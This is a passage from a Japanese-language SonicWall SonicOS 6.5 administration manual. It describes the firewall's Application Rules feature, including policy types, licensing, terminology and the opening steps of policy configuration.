• アプリケーシ ョ ン ルール ウィザードを使用する (45 ページ)

• アプリケーシ ョ ン ルール設定の確認 (45 ページ)

• 便利なツール (46 ページ)

• アプリケーシ ョ ン ルールの使用例 (51 ページ)

• 一致オブジェク トでの正規表現の作成 (52 ページ)

• ポリシーベースのアプリケーシ ョ ン ルール (53 ページ)

• アプリケーシ ョ ン シグネチャ ベース ポリシーのログ (54 ページ)

• コンプライアンスの施行 (55 ページ)

• サーバの保護 (55 ページ)

• ホスト される電子メール環境 (55 ページ)

• 電子メール制御 (56 ページ)

• ウェブ ブラウザ制御 (57 ページ)

• HTTP POST 制御 (58 ページ)

• 禁止するファイル タイプ制御 (60 ページ)

• ActiveX コン ト ロール (62 ページ)

• FTP 制御 (64 ページ)

• 帯域幅管理 (70 ページ)

• DPI を迂回する (70 ページ)

• 個別のシグネチャ (72 ページ)

• リバース シェル悪用の防御 (75 ページ)

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定31

アプリケーシ ョ ン ルールについてこのセクシ ョ ンでは、 SonicOS におけるアプリケーシ ョ ン ルール機能の概要について説明します。

ト ピッ ク :

• アプリケーシ ョ ン ルールとは? (32 ページ)

• アプリケーシ ョ ン ルールのメ リ ッ ト (34 ページ)

• アプリケーシ ョ ン制御の仕組み (35 ページ)

• アプリケーシ ョ ン ルールとアプリケーシ ョ ン制御 のライセンス (39 ページ)

• 用語 (41 ページ)

アプリケーシ ョ ン ルールとは?アプリケーシ ョ ン ルールは、 アプリケーシ ョ ン シグネチャのポリシー ルールを設定するためのソ

リ ューシ ョ ンを提供します。 アプリケーシ ョ ン ルールは、 アプリケーシ ョ ン固有のポリシーのセッ

ト と して、 ユーザ、 電子メール アドレス、 スケジュール、 および IP サブネッ トの各レベルのネッ ト

ワーク ト ラフ ィ ッ クをきめ細かく制御できるよ うにします。 このアプリケーシ ョ ン層アクセス制御

機能の主な目的は、 ウェブ ブラウジング、 フ ァイル転送、 電子メール、 および電子メール添付フ ァ

イルを制限することにあります。

アプリケーシ ョ ン層ト ラフ ィ ッ クを SonicOS で制御できる機能が、 リアルタイムのアプリケーシ ョ ン

ト ラフ ィ ッ ク フローを表示できる機能や、 アプリケーシ ョ ン シグネチャ データベースにアクセスし

たりアプリケーシ ョ ン層ルールを作成したりする新しい方法によって大幅に強化されています。SonicOS では、 すべてのネッ トワーク ト ラ フ ィ ッ クにわたって制御をより強化するために、 アプリ

ケーシ ョ ン制御と標準のネッ トワーク制御機能が統合されています。

ト ピッ ク :

• アプリケーシ ョ ン ルール ポリシー (32 ページ)

• アプリケーシ ョ ン ルールの性能について (33 ページ)

アプリケーシ ョ ン ルール ポリシー

SonicOS では、 アプリケーシ ョ ン ルール ポリシーを作成してネッ トワーク内のアプリケーシ ョ ンを制

御するために以下の方法を提供しています。

• 「ルール > アプリケーシ ョ ン ルール - ルール > アプリケーシ ョ ンルール」 ページでは、 アプリ

ケーシ ョ ン ルール ポリシーを作成する方法を提供しています。 アプリケーシ ョ ン ルールの対

象が拡大されているのは、 一致オブジェク トや動作オブジェク ト、 場合によっては電子メール

アドレス オブジェク ト もポリシーに組み込まれているからです。 柔軟性を高めるために、 アプ

リケーシ ョ ン ポリシーは、 「ルール > アプリケーシ ョ ン制御 」 ページで利用できる任意の種

別、 アプリケーシ ョ ン、 またはシグネチャで同じアプリケーシ ョ ン制御にアクセスできます。「オブジェ ク ト > 一致オブジェ ク ト」 ページは、 アプリケーシ ョ ン ルール ポリシーで一致オ

ブジェ ク ト と して使用するアプリケーシ ョ ン リス ト オブジェ ク ト、 アプリケーシ ョ ン種別リ

ス ト オブジェク ト、 およびアプリケーシ ョ ン シグネチャ リス ト オブジェク ト を作成する方法

メモ : アプリケーシ ョ ン ルールは、 SuperMassive、 NSA、 TZ300 以上の TZ シリーズ アプライアン

スでサポート されています。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定32

を提供します。 「一致オブジェク ト」 ページでは、 ネッ トワーク ト ラフ ィ ッ ク内のコンテンツ

を照合するための正規表現も設定できます。 「オブジェ ク ト > 動作オブジェ ク ト」 ページで

は、 ポリシーで使う個別動作を作成できます。

• 「ルール > アプリケーシ ョ ン制御 - ルール > アプリケーシ ョ ン制御」 ページでは、 アプリケー

シ ョ ン制御ポリシーを作成する方法を提供しています。 詳細については、 アプリケーシ ョ ン制御の設定 (80 ページ) を参照して ください。

• 「アプリケーシ ョ ン ルール ガイド - アプリケーシ ョ ン ルール ガイド (ウィザード ) は、 アプリ

ケーシ ョ ン ルール ポリシーの安全な設定を一般的な多くの使用事例について提供しますが、

あらゆる使用事例に対応しているわけではありません。

アプリケーシ ョ ン ルールの性能について

アプリケーシ ョ ン ルールのデータ漏洩抑止コンポーネン トは、 フ ァイルやドキュ メン ト をスキャン

してコンテンツやキーワードを探す機能を備えています。 アプリケーシ ョ ン ルールを使用すると、

特定のファイル名、 ファイルの種類、 電子メール添付ファイル、 添付ファイルの種類、 特定の件名を持つ電子メール、 特定のキーワードまたはバイ ト パターンを含む電子メールまたは添付ファイルの

転送を制限できます。 内部または外部ネッ ト ワーク アクセスを各種の条件に基づいて禁止できま

す。 パケッ ト監視を使ってアプリケーシ ョ ン ト ラフ ィ ッ クを詳細に調査可能で、 アプリケーシ ョ ン

によって使われるネッ トワーク帯域を削減するために様々な帯域幅管理設定が選択可能です。

アプリケーシ ョン ルールは、 SonicWall の Reassembly-Free Deep Packet Inspection ™ (RF-DPI) 再組み立てが

不要な精密パケッ ト検査技術に基づいて、 ポリシーベースの個別動作を作成することを可能にするインテリジェン トな防御機能も提供します。 個別動作の例を次に示します。

• シグネチャに基づく アプリケーシ ョ ン全体の遮断

• アプリケーシ ョ ン機能またはサブコンポーネン トの遮断

• ファイルの種類ごとの帯域幅調整 (HTTP または FTP プロ ト コルを使用する場合)

• 添付ファイルの遮断

• 個別遮断ページの送信

• 個別電子メール応答の送信

• HTTP 要求のリダイレク ト

• FTP 制御チャンネルでの個別 FTP 応答の送信

アプリケーシ ョ ン ルールは、 アプリケーシ ョ ンレベルのアクセス制御、 アプリケーシ ョ ン層帯域幅

管理、 およびデータ漏洩の抑止機能を主に提供する一方で、 個別のアプリケーシ ョ ン一致またはプロト コル一致のシグネチャを作成する機能も備えています。 プロ ト コルの固有の部分を照合するこ とで、 任意のプロ ト コルに対応する個別アプリケーシ ョ ン ルール ポリシーを作成できます。 個別のシ

グネチャ (72 ページ) を参照して ください。

アプリケーシ ョ ン ルールは、 機密文書が誤って転送されるのを防ぐための優れた機能を提供しま

す。 例えば、 Outlook Exchange の自動アドレス補完機能を使用している場合、 一般的な名前に対して

誤ったアドレスが補完されてしまう こ とはよ く あります。 例については、 Outlook Exchange の自動ア

ドレス補完を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定33

Outlook Exchange の自動アドレス補完

アプリケーシ ョ ン ルールのメ リ ッ トアプリケーシ ョ ン ルール機能には、 次のような利点があります。

• アプリケーシ ョ ン ベースの設定により、 アプリケーシ ョ ン制御用のポリシーの設定が容易で

ある。

• アプリケーシ ョ ン ルール購読サービスによって新しい攻撃の出現時に更新されたシグネチャが

提供される。

• 「装置の健全性 | ライブ監視」 の 「監視」 ビュー見られるような、 関連するアプリケーション インテリジェンス機能が 30 日間無料ト ライアルのアプリケーシ ョ ン可視化ライセンスと して登

録時に利用できる。 これによ り、 任意の登録済み SonicWall 装置でネッ ト ワーク内のアプ リ

ケーシ ョ ン ト ラフ ィ ッ クに関する情報を明確に表示できる。 アプリケーシ ョ ン可視化およびア

プリケーシ ョ ン制御のライセンスは、 SonicWall セキュリテ ィ サービス ライセンスのバンドル

にも含まれています。

• 同じアプリケーシ ョ ンの他のシグネチャに影響を与えることな く個々のシグネチャのポリシー設定を行えます。

• アプリケーション ルールおよび アプリケーション制御 の設定ページは、 「ポリシー | ルール 」および 「ポリシー | オブジェク ト メニューで利用可能です。 これらは管理インターフ ェースに

あり、 すべてのファイアウォールとアプリケーシ ョ ン制御のアクセス ルールとポリシーを同じ

エリアに統合します。

アプリケーシ ョ ン ルール機能は、 3 つの主要な製品種別と比較することができます。

• スタンドアロン プロキシ装置

• ファイアウォール VPN 装置に統合されたアプリケーシ ョ ン プロキシ

• 個別のシグネチャがサポート されるスタンドアロン IPS 装置

通常、 スタン ドアロン プロキシ装置は、 特定のプロ ト コルに対してきめ細かいアクセス制御を提供

するように設計されています。 SonicWall アプリケーシ ョ ン制御は、 HTTP、 FTP、 SMTP、 POP3 などの

複数のプロ ト コルにわたってアプリケーシ ョ ン レベルのきめ細かいアクセス制御を提供します。 ア

プリケーシ ョ ン制御はファイアウォール上で動作するため、 受信ト ラフ ィ ッ クと送信ト ラフ ィ ッ クの両方を制御できます。 これに対し、 専用のプロキシ装置は、 一方向にのみ配備されるのが一般的です。 「アプ リケーシ ョ ン ルール」 と 「 アプリケーシ ョ ン制御」 を使用したアプリケーシ ョ ン制御

は、 専用のプロキシ アプライアンスよ り も優れたパフォーマンスとスケーラビ リテ ィ を提供しま

す。 これらは SonicWall の専用技術に基づいているからです。

メモ : SonicOS 管理インターフ ェースをアクテ ィブにするには、 この機能を有効にする必

要があります。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定34

今日の統合アプリケーシ ョ ン プロキシでは、 アプリケーシ ョ ン レベルのきめ細かいアクセス制御、

アプリケーシ ョ ン層帯域幅管理、 およびデジタル権利管理機能は提供されません。 専用プロキシ装置の場合と同様、 SonicWall アプリケーシ ョ ン制御は、 統合アプリケーシ ョ ン プロキシ ソ リューシ ョ ン

よりもはるかに高いパフォーマンスとスケーラビリテ ィ を提供します。

一部のスタンドアロン IPS 装置ではプロ ト コル デコード サポートが提供されていますが、 アプリケー

シ ョ ン レベルのきめ細かいアクセス制御、 アプリケーシ ョ ン層帯域幅管理、 およびデジタル権利管

理機能をサポートする製品は存在しません。

アプリケーシ ョ ン ルールを SonicWall Email Security と比較した場合、 それぞれに利点があります。 EmailSecurity は SMTP に対してのみ有効ですが、 非常に幅広いポリシー空間を利用できます。 アプリケー

シ ョ ン ルールは、 SMTP、 POP3、 HTTP、 FTP、 およびその他のプロ ト コルに対して有効で、 フ ァ イア

ウォール上の SonicOS に統合され、 Email Security よりも高いパフォーマンスを発揮します。 ただし、

アプリケーシ ョ ン ルールでは、 Email Security において SMTP に対して提供されるポリシー オプシ ョ ン

がすべて提供されるわけではありません。

アプリケーシ ョ ン制御の仕組みアプリケーシ ョ ン ルールおよびアプリケーシ ョ ン制御では、 SonicOS の精密パケッ ト検査を利用し

て、 ゲートウェ イを通過するアプリケーシ ョ ン層ネッ トワーク ト ラフ ィ ッ クをスキャンし、 設定さ

れているアプリケーシ ョ ンに一致するコンテンツを検索します。 一致するものが見つかると、 これらの機能は設定されている動作を実行します。 アプリケーシ ョ ン ルールポリシーの設定時には、 アプ

リケーシ ョ ンの遮断とログ記録のどちらを行うか、 どのユーザ、 グループ、 または IP アドレスを対

象と して含めるか除外するか、 また執行のスケジュールを定義するグローバル ルールを作成しま

す。 さらに、 以下を定義するアプリケーシ ョ ン ルール ポリシーも作成できます。

• スキャンするアプリケーシ ョ ンの種類

• 照合する方向、 コンテンツ、 キーワード、 またはパターン

• 照合するユーザまたはド メイン

• 実行する動作

以下のセクシ ョ ンでは、 アプリケーシ ョ ン ルールのメイン コンポーネン トについて説明します。

• 帯域幅管理を用いた動作について (173 ページ)

• パケッ ト監視を使用したアクシ ョ ンの関連タスク (179 ページ)

• アプリケーシ ョ ン制御ポリシーの作成について (82 ページ)

• アプリケーシ ョ ン ルール ポリシーの作成について (36 ページ)

• 一致オブジェク トについて (150 ページ)

• アプリケーシ ョ ン リス ト オブジェク トについて (161 ページ)

• 動作オブジェク トについて (169 ページ)

• 電子メール アドレス オブジェク トについて (222 ページ)

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定35

アプリケーシ ョ ン ルール ポリシーの作成について アプリケーシ ョ ン ルールを使用すると、 ネッ トワーク上のト ラフ ィ ッ クの特定の側面を制御する個別

アプリケーシ ョ ン ルール ポリシーを作成できます。 ポリシーは、 一致オブジェク ト、 プロパテ ィ、 お

よび特定の防御動作のセッ トです。 ポリシーを作成するときは、 初に一致オブジェク トを作成したうえで、 動作を選択 (オプションでカスタマイズ) し、 これらをポリシー作成時に参照します。

「ルール > アプリケーシ ョ ン ルール」 ページで、 「アプリケーシ ョ ン制御ポリシーの編集」 ダイアロ

グにアクセスできます。 ダイアログのオプシ ョ ンは、 選択するポリシー種別によって変化します。 たとえば、 「SMTP クライアン ト」 が選択されている場合、 オプシ ョ ンは 「アプリケーシ ョ ン制御コン

テンツ」 の 「ポリシータイプ」 とは大き く異なります。

ポリシーの例を次に示します。

• ギャンブルのようなアクテ ィ ビテ ィに関するアプリケーシ ョ ンを遮断する。

• .exe および .vbs 形式の電子メール添付ファイルを無効にする。

• 送信 HTTP 接続で Mozilla ブラウザを許可しない。

• 発信元が CEO と CFO の場合を除き、 "SonicWall Confidential (SonicWall 社外秘)" というキー

ワードを含む、 送信電子メールまたは MS Word 添付ファイルを許可しない。

• すべての機密文書内でグラフ ィ ッ クまたは透かしが検出された送信電子メールを許可しない。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定36

ポリシーを作成するときは、 ポリシー種別を選択します。 それぞれのポリシー種別は、 ポリシーの送信元、 送信先、 一致オブジェク ト種別、 および動作フ ィールドに有効な値または値タイプを指定します。 さらに、 ポリシーを定義することで、 特定のユーザまたはグループを対象と して含めるかまたは除外するかの指定、 スケジュールの選択、 ログ記録の有効化、 接続側の指定、 および基本または詳細方向タイプの指定を行う こともできます。 基本方向タイプは、 受信または送信のみを単に示します。詳細方向タイプでは、 ゾーン間の送信の方向 (例えば LAN から WAN) を設定できます。

アプリケーシ ョ ン ルール: ポリシー種別テーブルに、 使用可能なアプリケーシ ョ ン ポリシー種別の特

徴を示します。

アプリケーシ ョ ン ルール: ポリシー種別

ポリシー種別

説明

有効な送信元サービス/既定

有効な送信先サービス/既定

有効な一致オブジェク ト種別

有効な動作種別 接続側

アプリケーシ ョン制御コンテンツ

任意のアプリケーシ ョ ン層プロ ト コルの動的なアプリケーシ ョ ン ルール関連オブジェク ト を使用するポリシー

すべて/すべて

すべて/すべて

アプリケーシ ョ ン種別リス ト、 アプリケーシ ョ ン リス ト、 アプリケーシ ョ ンシグネチャ リス

リセッ ト /破棄 動作なし DPI を迂回する パケッ ト監視、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

N/A

個別ポリシー

任意のアプリケーシ ョ ン層プロ ト コルの個別オブジェク ト を使用するポリシー、IPS 形式の個

別のシグネチャを作成するのに使用可

すべて/すべて

すべて/すべて

個別オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

クライアント側、 サーバ側、 両方

FTP クライ

アン ト FTP 制御チャ

ンネルで転送されるすべての FTPコマン ド

すべて/すべて

FTP 制御/FTP 制御

FTP コマン

ド、 FTP コマ

ンド+値、 個別

オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし

クライアント側

FTP クライ

アン ト ファイル アップロード要求

FTP でファイ

ルをアップロード しようとする試み (STOR コマン

ド )

すべて/すべて

FTP 制御/FTP 制御

ファイル名、ファイル拡張子

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

クライアント側

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定37

FTP クライ

アン ト ファイル ダウンロード要求

FTP でファイ

ルをダウンロード しようとする試み (RETR コマン

ド )

すべて/すべて

FTP 制御/FTP 制御

ファイル名、ファイル拡張子

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

クライアント側

FTP データ

転送ポリシー

FTP データ チャンネルで転送されるデータ

すべて/すべて

すべて/すべて

ファイル内容オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし

両方

HTTP クラ

イアン ト

ウェブ ブラ

ウザ ト ラ

フ ィ ッ クまたはクライアント上で発生するすべての HTTP 要求に

適用されるポリシー

すべて/すべて

すべて/HTTP (設定可能)

HTTP ホス

ト、 HTTP Cookie、 HTTP リファラ、HTTP Request 個別ヘッダー、 HTTP URI コンテン

ツ、 HTTP ユーザ エー

ジェン ト、ウェブ ブラウ

ザ、 ファイル名、 ファイル拡張子個別オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視1 動作なし、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

クライアント側

HTTP サーバ

HTTP サーバ

から発信される応答

すべて/HTTP (設定可能)

すべて/すべて

ActiveX クラス ID、 HTTP Set Cookie、 HTTP Response、フ ァイル内容オブジェクト、 個別ヘッダー、 個別オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし 帯域幅管理グローバル -* WAN 帯域幅管

理 *

サーバ側

IPS コンテ

ンツ

任意のアプリケーシ ョ ン層プロ ト コルの動的な侵入防御関連オブジェク ト を使用するポリシー

N/A N/A IPS シグネチャ

種別リス ト、IPS シグネ

チャ リス ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし、 帯域幅管理グローバル -* WAN 帯域幅管

理 *

N/A

アプリケーシ ョ ン ルール: ポリシー種別

ポリシー種別

説明

有効な送信元サービス/既定

有効な送信先サービス/既定

有効な一致オブジェク ト種別

有効な動作種別 接続側

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定38

アプリケーシ ョ ン ルールとアプリケーシ ョ ン制御 のライセンスアプリケーシ ョ ンの視覚化および制御には、 次の 2 つのコンポーネン トがあります。

• 可視化コンポーネン トは、 「装置の健全性」 ページの 「監視」 ビューのアプリケーシ ョ ン ト ラ

フ ィ ッ クの識別とレポート を提供します。

POP3 クラ

イアン ト

POP3 クライ

アン トによって生成されたト ラフ ィ ッ クを検査するポリシー、 通常は POP3 サー

バ管理者にとって有用

すべて/すべて

POP3 (電子

メールの取得)/POP3 (電子メールの取得)

個別オブジェク ト

リセッ ト /破棄 DPI を迂回する パケッ ト監視 動作なし

クライアント側

POP3サーバ

POP3 サーバ

からPOP3 クライアン トにダウンロードされた電子メールを検査するポリシー、 電子メール フ ィ

ルタに使用

POP3 (電子メールの取得)/POP3 (電子メールの取得)

すべて/すべて

電子メール本文、 電子メール CC、 電子

メール送信元、 電子メール送信先、 電子メール件名、 ファイル拡張子、MIME 個別

ヘッダー

リセッ ト /破棄 電子メール添付ファイルを無効化 - テキストの

追加 DPI を迂回

する 動作なし

サーバ側

SMTP クラ

イアン ト

クライアン ト上で発生するSMTP ト ラ

フ ィ ッ クに適用されるポリシー

すべて/すべて

SMTP (電子

メールの送信)/SMTP (電子メールの送信)

電子メール本文、 電子メール CC、 電子

メール送信元、 電子メール送信先、 電子メール サイ

ズ、 電子メール件名、 個別オブジェクト、 ファイル内容、 ファイル名、 ファイル拡張子、MIME 個別

ヘッダー

リセッ ト /破棄 応答を返さずに SMTP 電子メー

ルを遮断 DPI を迂回する パケッ ト監視 動作なし

クライアント側

1. パケッ ト監視動作は、 フ ァイル名またはファイル拡張子個別オブジェ ク トに対してサポート されていません。

アプリケーシ ョ ン ルール: ポリシー種別

ポリシー種別

説明

有効な送信元サービス/既定

有効な送信先サービス/既定

有効な一致オブジェク ト種別

有効な動作種別 接続側

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定39

• 制御コンポーネン トは、 アプリケーション制御としてライセンスされ、 ネッ トワークで処理されるアプリケーション ト ラフ ィ ックのログ記録、 遮断、 帯域幅管理を行うための個別のアプリケー

ション制御ポリシーとアプリケーション ルール ポリシーの作成および執行を可能にします。

また、 アプリケーシ ョ ン可視化とアプリケーシ ョ ン制御は、 SonicWall ゲートウェイ アンチウイルス

(GAV)、 アンチスパイウェア、 侵入防御サービス (IPS) を含むその他のセキュリテ ィ サービスと合わせ

たバンドル形式でライセンスされます。

30 日間無料ト ライアルは、 バン ドルされている他のサービスでも使用できますが、 アプリケーシ ョ

ン可視化やアプリケーシ ョ ン制御の場合のように自動的に有効になることはありません。 追加の無料ト ライアルは、 SonicOS の個別のセキュリテ ィ サービス ページまたは MySonicWall で開始できます。

アプリケーシ ョ ン制御の使用を開始するには、 この機能を 「ルール > アプリケーシ ョ ン制御」 ページ

の 「アプリケーシ ョ ン制御のグローバル設定」 セクシ ョ ンで有効にする必要があります。

「アプ リケーシ ョ ン ルール」 と 「アプ リケーシ ョ ン制御」 で作成したポリシーを使用するには、

「ルール > アプリケーシ ョ ン制御」 ページで 「アプリケーシ ョ ン制御を有効にする」 を選択します。

30 日間ト ライアルを開始する (登録時) か、 セキュ リテ ィ サービス ライセンス バンドルを購入する

と、 SonicWall ライセンス サーバによってアプリケーシ ョ ン可視化とアプリケーシ ョ ン制御のライセ

ンス キーがファイアウォールに提供されます。

ライセンスは、 www.mysonicwall.com の 「ゲートウェイ サービス」 の下にある 「サービス管理」 ペー

ジで入手できます。

セキュリテ ィ サービス ライセンス バンドルには、 次の購読サービスのライセンスが含まれます。

• アプリケーシ ョ ン可視化

• アプリケーシ ョ ン制御

• ゲートウェイ アンチウイルス

• ゲートウェイ アンチスパイウェア

• 侵入防御サービス

アプリケーシ ョ ン シグネチャの更新と他のセキュリテ ィ サービスのシグネチャの更新は、 これらの

サービスのライセンスされている限り、 定期的にファイアウォールにダウンロード されます。

2 つのファイアウォール間で高可用性が設定されていると、 それらの装置はセキュリテ ィ サービス ライセンスを共有できます。 この機能を使用するには、 MySonicWall でフ ァイアウォールを関連付けら

メモ : MySonicWall での登録時や、 登録済み SonicWall 機器への SonicOS のロード時には、 サポー

ト されている SonicWall 装置でアプリケーシ ョ ン可視化とアプリケーシ ョ ン制御の 30 日間ト ラ

イアル ライセンスが自動的に開始され、 アプリケーシ ョ ン シグネチャが装置にダウンロード さ

れます。

メモ : SonicOS 管理インターフェースでアプリケーシ ョ ン制御を無効にしている場合は、 その機

能を再び有効にするまでアプリケーシ ョ ン シグネチャの更新が中断されます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定40

れた製品として登録する必要があります。 どちらの装置も同じ SonicWall ネッ トワーク セキュリテ ィ

装置モデルでなければなりません。

用語アプリケーション層: 7 層 OSI モデルの 7 番目のレベル。 AIM、 DNS、 FTP、 HTTP、 IMAP、 MSN Messenger、POP3、 SMTP、 SNMP、 Telnet、 および Yahoo Messenger はアプリケーション層プロト コルの例です。

帯域幅管理: ネッ トワークの渋滞およびネッ トワークのパフォーマンス劣化を回避するために、 ネッ

トワーク リンク上のト ラフ ィ ッ クを計測して制御する処理です。

クライアン ト : 通常、 クライアン ト /サーバ手法におけるクライアン トは、 パーソナル コンピュータまた

はワークステーション上で実行され、 サーバを利用して一部の処理を実行するアプリケーションです。

デジタル権利管理: デジタル データへのアクセスとその利用を制御するために出版社や著作権保有者

によって使用される技術。

FTP: ファイル転送プロ ト コル。 インターネッ ト上でファイルを交換するためのプロ ト コル。

ゲートウェイ : ネッ トワークへの入り口と して動作するコンピュータ。 フ ァイアウォールやプロキシ

サーバとして使用されることもよ くあります。

きめ細かい制御: システムの個別のコンポーネン ト を制御できること。

16 進: 基数を 16 とする記数法。

HTTP: Hyper Text Transfer Protocol。 World Wide Web によって使用される基底のプロ ト コル。

HTTP リダイレク ト : 1 つのウェブ ページを多くの URL で利用できるようにするウェブ上の手法。 URLリダイレク ト とも呼ばれます。

IPS: 侵入防御サービス

MIME: Multipurpose Internet Mail Extensions。 グラ フ ィ ッ ク、 オーデ ィ オ、 ビデオなどの非 ASCII メ ッ

セージをインターネッ ト上で転送できるように形式化するための仕様。

POP3: Post Office Protocol。 メール サーバから電子メールを取得するために使用されるプロ ト コル。

SMTP と一緒に使用することもできます。

プロキシ: クライアン トが他のネッ トワーク サービスに間接的にネッ トワーク接続できるようにする

ネッ トワーク サービスを実行するコンピュータ。

SMTP: Simple Mail Transfer Protocol。 サーバ間で電子メール メ ッセージを送信するために使用されるプ

ロ ト コル。

UDP: User Datagram Protocol。 IP ネッ トワーク上で実行されるコネクシ ョ ンレス プロ ト コル。

重要 : 高可用性ペアでは、 MySonicWall で初めて装置を登録する場合も、 プライマリ装置とセカ

ンダリ装置の双方を SonicOS 管理インターフェースから個別に登録して、 各装置のそれぞれの管

理 IP アドレスにログインする必要があります。 これにより、 セカンダリ装置はファイアウォー

ル ライセンス サーバと同期され、 関連付けられているプライマリ装置とライセンスを共有でき

るよ うになります。 インターネッ トへのアクセスが制限されている場合は、 共有するライセンスを手動で両方の装置に適用できます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定41

ルール > アプリケーシ ョ ン ルール

アプリケーシ ョ ン ルール ポリシーを使用するには、 その前にアプリケーシ ョ ン制御を有効にする必

要がありますが、 その機能を有効にしないでポリシーを作成することはできます。 アプリケーシ ョ ン制御はグローバル設定で有効になっており、 制御する各ネッ トワーク ゾーンで有効にする必要があ

ります。

アプリケーシ ョ ン制御ポリシーを設定するには、 アプリケーシ ョ ン ルール ウ ィザード を使用する

か、 「ルール> アプリケーシ ョ ン ルール」 ページを手動で設定します。 ウィザードを使用すると、 安

全に設定を行う こ とができ、 ネッ トワーク ト ラフ ィ ッ クを不必要に遮断するようなエラーを防ぐこ

とができます。 手動による設定では、 個別の動作またはポリシーが必要な状況により柔軟に対応できます。

アプリケーシ ョ ン ルール ポリシーには、 一致オブジェ ク ト (またはアプリケーシ ョ ン リス ト オブ

ジェク ト ) とアクシ ョ ン オブジェク トが必要です。 「オブジェク ト > 一致ブジェク ト」 ページで一致

オブジェク ト を設定できます。 また、 「オブジェク ト > 一致オブジェク ト」 ページでアプリケーシ ョ

ン リス ト オブジェ ク ト を設定します。 アプリケーシ ョ ン リス ト オブジェ ク ト を作成するときは、

「ルール > アプリケーシ ョ ン制御」 ページに表示されているのと同じアプリケーシ ョ ン カテゴリ、 シ

グネチャ、 または特定のアプリケーシ ョ ンから選択します。 動作オブジェク トは、 「オブジェク ト >動作オブジェク ト」 ページで作成されます。

これと比較して、 「ルール > アプリケーシ ョ ン制御」 ページでアプリケーシ ョ ン制御のグローバル ブロックまたはログ設定を構成できます。 一致オブジェク トまたは動作オブジェク トは必要ありません。

アプリケーシ ョ ン ルール ポリシーとそれに使用されるオブジェ ク トの設定については、 次のト ピッ

クを参照して ください。

• アプリケーシ ョ ンルールポリシーの設定 (42 ページ)

• アプリケーシ ョ ン ルール ウィザードを使用する (45 ページ)

• オブジェク ト > 一致 オブジェク ト (150 ページ)

• オブジェク ト > 動作オブジェク ト (168 ページ)

• オブジェク ト > 電子メール アドレス オブジェク ト (222 ページ)

• アプリケーシ ョ ン ルール設定の確認 (45 ページ)

• アプリケーシ ョ ン ルールの使用例 (51 ページ)

アプリケーシ ョ ンルールポリシーの設定必要な一致オブジェ ク ト と動作オブジェ ク ト を作成すると、 これらのオブジェ ク ト を使用するポリシーを作成できるようになります。

アプリケーシ ョ ン制御ウ ィザード を使ったポリシーの作成については、 アプリケーシ ョ ン ルール

ウィザードを使用する (45 ページ) を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定42

ポリシーおよびポリシー種別の詳細については、 アプリケーシ ョ ン ルール ポリシーの作成について

(36 ページ) を参照して ください。

アプリケーシ ョ ン ルール ポリシーを設定するには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン ルール」 ページを開きます。

2 ページの上部にある 「 追加」 を選択します。 「アプリケーシ ョ ン制御ポリシーの編集」 ダイア

ログが表示されます。

3 「ポリシー名」 フ ィールドに、 わかりやすい名前を入力します。

4 ドロップダウン メニューから 「ポリシー種別」 を選択します。 ここでの選択によって、 ダイア

ログに表示されるオプシ ョ ンが変わります。 使用できるポリシー種別の詳細については、 アプリケーシ ョ ン ルール ポリシーの作成について (36 ページ) を参照して ください。

5 「アドレス」 ドロップダウン メニューから送信元および送信先のアドレス グループまたはアド

レス オブジェク ト を選択します。 「IPS コンテンツ」 、 「アプリケーシ ョ ン制御コンテンツ」 、

または 「CFS」 のポリシー種別では、 単一の 「アドレス」 フ ィールドのみを使用できます。

メモ : 「ルール > アプリケーシ ョ ン制御」 ページで設定されたポリシーは、 「ルール > アプリ

ケーシ ョ ン ルール」 ページで設定されたポリシーよりも優先されます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定43

6 「サービス」 ドロップダウン メニューから送信元または送信先サービスを選択します。 ポリシー

種別によってはサービスを選択できない場合があります。

7 「除外アドレス」 で、 ドロップダウン メニューからアドレス グループまたはアドレス オブジェ

ク ト を必要に応じて選択します。 このアドレスは、 ポリシーの影響を受けません。

8 「一致オブジェ ク ト」 で、 ポリシー種別に当てはまる定義済みの一致オブジェ ク ト を含むドロップダウン メニューから一致オブジェ ク ト を選択します。 「ポリシー種別」 が 「HTTP クラ

イアン ト」 の場合、 必要に応じて除外一致オブジェク ト を選択できます。

除外一致オブジェ ク ト を使用する と、 ポリシーのサブ ド メ インを区別できます。 例えば、news.yahoo.com は許可するが、 その他すべての yahoo.com サイ トは遮断したい場合は、

yahoo.com と news.yahoo.com の両方に対して一致オブジェ ク ト を作成します。 さ らに、

「一致オブジェ ク ト」 yahoo.com を遮断するポリシーを作成し、 「一致オブジェ ク ト を除

外」 を news.yahoo.com に設定します。

